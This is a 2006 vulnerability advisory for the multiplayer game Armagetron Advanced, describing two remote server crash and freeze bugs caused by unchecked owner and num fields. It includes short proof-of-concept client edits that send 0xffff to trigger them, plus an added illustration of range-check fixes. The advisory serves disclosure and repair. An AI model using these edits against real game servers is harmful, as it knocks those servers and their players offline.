#######################################################################

Luigi Auriemma

Application:  Armagetron Advanced
              http://armagetronad.net
Versions:     <= 2.8.2 and current SVN
Platforms:    Windows, *nix, *BSD, Mac and others
Bugs:         A] crash through an invalid owner value
              B] freeze through invalid num in id_req_handler
Exploitation: remote, versus server
Date:         16 Jul 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Armagetron Advanced is a well-known multiplayer game inspired by the famous film Tron.

#######################################################################

=======
2) Bugs
=======

---------------------------------------
A] crash through an invalid owner value
---------------------------------------

The program terminates or crashes when a client sends an owner value larger than MAXCLIENTS+1.
The function that reads this value is the following, located in network/nNetObject.cpp:

  nNetObject::nNetObject(nMessage &m):lastSyncID_(m.MessageIDBig()),refCtr_(0)

If the value is not excessively large, the server terminates with the following message:

  Internal Error: Internal error in static nMachine& nMachine::GetMachine (short unsigned int) in network/nNetwork.cpp:3820 :
  Assertion userID <= MAXCLIENTS+1 failed

-----------------------------------------------
B] freeze through invalid num in id_req_handler
-----------------------------------------------

A client can freeze the server by using a very large num value (such as 0x7fff or 0xffff) in the id_req_handler function used by the server in network/nNetObject.cpp.
The server will become and remain frozen with the CPU at 100%.
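The two bugs above share one root cause: a 16-bit field taken from the wire (owner, num) is used as a slot index or a loop bound before being range-checked. The following is an added illustration, not code from the advisory or from the Armagetron Advanced project, of how such fields are validated at read time; nMessage is replaced by a minimal stand-in, and the values of MAXCLIENTS and ID_PREFETCH are assumed placeholders, since the advisory does not give them.

```cpp
#include <cstddef>
#include <cstdint>
#include <initializer_list>
#include <vector>

// Placeholder limits standing in for the project's own constants;
// their real values are not given in the advisory (assumed here).
constexpr unsigned short MAXCLIENTS  = 16;
constexpr unsigned short ID_PREFETCH = 50;

// Minimal stand-in for nMessage: a buffer of big-endian 16-bit fields.
struct Message {
    std::vector<uint8_t> bytes;
    size_t pos = 0;
    bool Read(unsigned short &out) {
        if (pos + 2 > bytes.size()) return false;   // truncated message
        out = static_cast<unsigned short>((bytes[pos] << 8) | bytes[pos + 1]);
        pos += 2;
        return true;
    }
};

// Bug A: the owner field must name an existing client slot before it is
// used as an index; otherwise the assertion in nMachine::GetMachine fires.
// Returns false (message rejected) instead of asserting on bad input.
bool ReadOwnerChecked(Message &m, unsigned short &owner) {
    if (!m.Read(owner)) return false;
    return owner <= MAXCLIENTS + 1;
}

// Bug B: the requested ID count must be bounded, otherwise a huge num
// keeps id_req_handler busy at 100% CPU. A client never legitimately
// asks for more than the prefetch window.
bool ReadIdRequestChecked(Message &m, unsigned short &num) {
    if (!m.Read(num)) return false;
    return num <= ID_PREFETCH;
}

// Builds a message from 16-bit fields (constructed sample input).
Message MakeMessage(std::initializer_list<unsigned short> fields) {
    Message m;
    for (unsigned short f : fields) {
        m.bytes.push_back(static_cast<uint8_t>(f >> 8));
        m.bytes.push_back(static_cast<uint8_t>(f & 0xff));
    }
    return m;
}
```

With these checks the malformed owner and num values named in the advisory are dropped at the parsing boundary rather than reaching the assertion or the ID loop.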
#######################################################################

===========
3) The Code
===========

A] to be added in WriteCreate in network/nNetObject.cpp:

  void nNetObject::WriteCreate(nMessage &m){
    m.Write(id);
    // m.Write(owner);
    m.Write(0xffff);

B] to be added in first_fill_ids in network/nNetObject.cpp:

  tJUST_CONTROLLED_PTR< nMessage > m = new nMessage(id_req);
  // m->Write(ID_PREFETCH - 10);
  m->Write(0xffff);

#######################################################################

======
4) Fix
======

A corrected version will be released shortly.

#######################################################################